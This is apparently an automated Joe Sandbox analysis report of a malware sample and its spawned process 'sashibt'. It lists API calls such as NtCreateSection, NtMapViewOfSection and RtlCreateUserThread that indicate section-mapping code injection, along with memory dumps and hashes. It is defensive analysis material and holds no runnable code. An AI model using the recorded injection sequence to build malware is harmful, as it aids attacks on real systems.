Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 02714219 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0271426A

Memory Dump Source

Source File: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270d000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 71a084931aee7daa48133238d76da91c702aaf596b29aa416b4e9ca087347e64
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: EA113C79A00208EFDB01DF98C985E99BBF5AF08751F158094F9489B361D371EA90DF80

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Non-executed Functions

Function 0255092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02550966
., xrefs: 0255095F
GetProcAddress., xrefs: 025509DC, 025509DF, 025509E4

Memory Dump Source

Source File: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2550000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 3b30d371d99762560751cfd30dcfa1940b64417329796989d75c866642f2db9e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 303159B6900619DFDB10CF99C880AAEBBF9FF48324F14444AD841A7354D771EA45CFA8

Function 004020E7 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

j1, xrefs: 004020EB

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: j1
API String ID: 0-4002328062
Opcode ID: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction ID: 7ffeeb59c018ebe80191c9150d7c44a1840aee0603b3a4286ce7f0937f8dfb2f
Opcode Fuzzy Hash: 4efd56776a1cf48e51d5b8b28f3c88fced1d5df91a33fef9abe88d0c8160b6dd
Instruction Fuzzy Hash: 1EF0287808838899CB02AF36C755B99FF31BF87335F78469ED9962A392C6200649C760

Function 00403303 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a51bae01530d42b41eb06adb90e5f85400fff33e68ac6cb8540c9dd99aa8fc
Instruction ID: 912dfae9893e2cdd640fcbe21e2cbd2b2d41974dc9ddeab6ca8b65de1779a802
Opcode Fuzzy Hash: 02a51bae01530d42b41eb06adb90e5f85400fff33e68ac6cb8540c9dd99aa8fc
Instruction Fuzzy Hash: AF41699292C2C15EEB161E2148625AA7FAC9A7331771504FFD842FA2C3E13DA703935F

Function 004020B8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction ID: 0881589c7ff5ff5768f2d8d6c75c742b5463282b0ed343a47442533531e174b2
Opcode Fuzzy Hash: 1a27345af654d8e993b371437472085dc99020dacbb88babffce4e4e1de5afcb
Instruction Fuzzy Hash: 1D110A3A449345D9C60155278B4AB6BFB707A53730B308667D257267E18979028AE337

Function 02713E37 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096146126.000000000270D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_270d000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: d83a16ddb3ead0f6f414bbefa9030e60ea76f8ee42a80497b4e6df607ea52cbe
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 86118E72340200AFDB54DF59DC81EA673EAEF88720B1981A9ED04CB315E675EC05CB60

Function 004020B6 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction ID: 5e4278b07ce3c8393ea1c67bbc9533801249a46e55f2d55876e4d3ceabbd52a2
Opcode Fuzzy Hash: 7679fe5b6e44f9d9bc89cc9259ef9fe0df295a63758788235af8aeaec9500c5a
Instruction Fuzzy Hash: 3F016174049348D9D7016A36DB4DBA7BB21BB43320F30826BD707352C2C9B4054BE367

Function 004020C4 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction ID: 5e560d39f8138ce68ee94cfd6023eaf6832ac934b81d0532f16e67c5e36192ac
Opcode Fuzzy Hash: 55f04470bba513d6a1ff85116eb4bd7e5a7bfe650738b85bdc777e345750bb4e
Instruction Fuzzy Hash: 80018E340493848ECB029B35C71A7A9FF71BF93335F34819FC5571A6E2C6240209D751

Function 02550D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2095808025.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2550000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: bc54c8e2bb7c38bd242663fc871baea8599cac1374cf3b423c6e1f852dcd5d4d
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: DA01F272A106108FDF21CF20C824BAB33E5FB8A306F1540A6DD0A972C1E370A8418F84

Function 004020E3 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction ID: fce5d5c764085920edf89c5c9efb60a7985776bdb309a80537f9fa9cbbd5f206
Opcode Fuzzy Hash: 6f6600757ac2f7f113cd3111149c0096a045daac26c52c0a983afeb1d7d6023c
Instruction Fuzzy Hash: 5DF04E7408834499DB416A36C7457A9FB21BF83320F34825FD547256D2CA74054AE711

Function 004020FC Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction ID: 9ff9efdcd1480cc8040ea01fdd64be9b4a39a154ba86f8cede482a75e84e4065
Opcode Fuzzy Hash: a78d0ae9cedb3364fca3541f3adf29928ee5114118790e41c8b89e96890051af
Instruction Fuzzy Hash: 36F02B7804574859CB02AF37C7416D9FF31BE83235F74464ED4561A392C720060DC760

Function 004025DD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction ID: f390e3d0f4c9bd654050140e8d70974a6db2ab88ea7c37a64fdc5b7086b4af87
Opcode Fuzzy Hash: fb15b2d9d84d8bcf95237442851c33c9a576287e722d5cdf4983b928f5d9cc64
Instruction Fuzzy Hash: 24E07227DC33200F87700ECDB0D60086F97B6B03233B60FAACA80333588B328C010288

Function 00402285 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction ID: de7e959eacdc078ffa18660aebfbf422b397b465e6f902e3b5059cef9d8e7c6e
Opcode Fuzzy Hash: 0f115ba61ab4e6362ff08d3704e71e4c4144fd1ee34f6209e35425aa647f651c
Instruction Fuzzy Hash: 6EF0273944D2488EDB15DF35D2D16BEFF71BE5321076A145CC5C70B102EA200248CBA0

Function 0040267C Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction ID: c4400a266d698cb3cd2bf7b5ca235fa4f1f280859f6ddc9359233ff16ff34d52
Opcode Fuzzy Hash: f051c0fcd709177014542cd0273e44ec655c7c60457a6c32fe43c7d43ebeaafc
Instruction Fuzzy Hash: B6A00249D125A384C524C50436C041C1A81305ED107689F05D180D9405F348C4C61043

Function 004026DC Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094646871.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction ID: 99d9351f112c3ed816393754bebdd5c910e51bb06e2b48d37259af443894e6f8
Opcode Fuzzy Hash: 4dc631e3e5db65b995aa59b44de7f2b4dcbe59aa107c656cad5b6ec07d9cd269
Instruction Fuzzy Hash:

Analysis Process: sashibtPID: 6768, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	36.2%
Signature Coverage:	0%
Total number of Nodes:	80
Total number of Limit Nodes:	3

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 025E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025E024D

Strings

kernel32.dll, xrefs: 025E008F, 025E0095
cess, xrefs: 025E018D

Memory Dump Source

Source File: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25e0000_sashibt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c97db3b646984794bd1160e20933eaed74d62d05f938e549ae04c2f16b3e5529
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 2C526974A01229DFDB64CF58C985BACBBB1BF09314F1480D9E54EAB391DB70AA85CF14

Function 0264436A Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02644392
Module32First.KERNEL32(00000000,00000224), ref: 026443B2

Memory Dump Source

Source File: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_263d000_sashibt.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: dc3dc1dc1b2a40b4f45433c9ac243f2e95a8d061c4c4350a4aaa27b3540a879d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 30F0BB322007156FD7213BF6BC8EB6EB6EDFF49A29F100628E682D15C0DF70E8454A61

Function 025E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025E0223,?,?), ref: 025E0E19
SetErrorMode.KERNELBASE(00000000,?,?,025E0223,?,?), ref: 025E0E1E

Memory Dump Source

Source File: 00000004.00000002.2333318255.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_25e0000_sashibt.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1cacf028484974530ae65c6e85c24824324feaa6d5fdbaaae33983dc66bd837b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9AD0123114512877DB003A94DC09BCD7F1CDF05B66F008021FB0DE9080C7B0954046E9

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
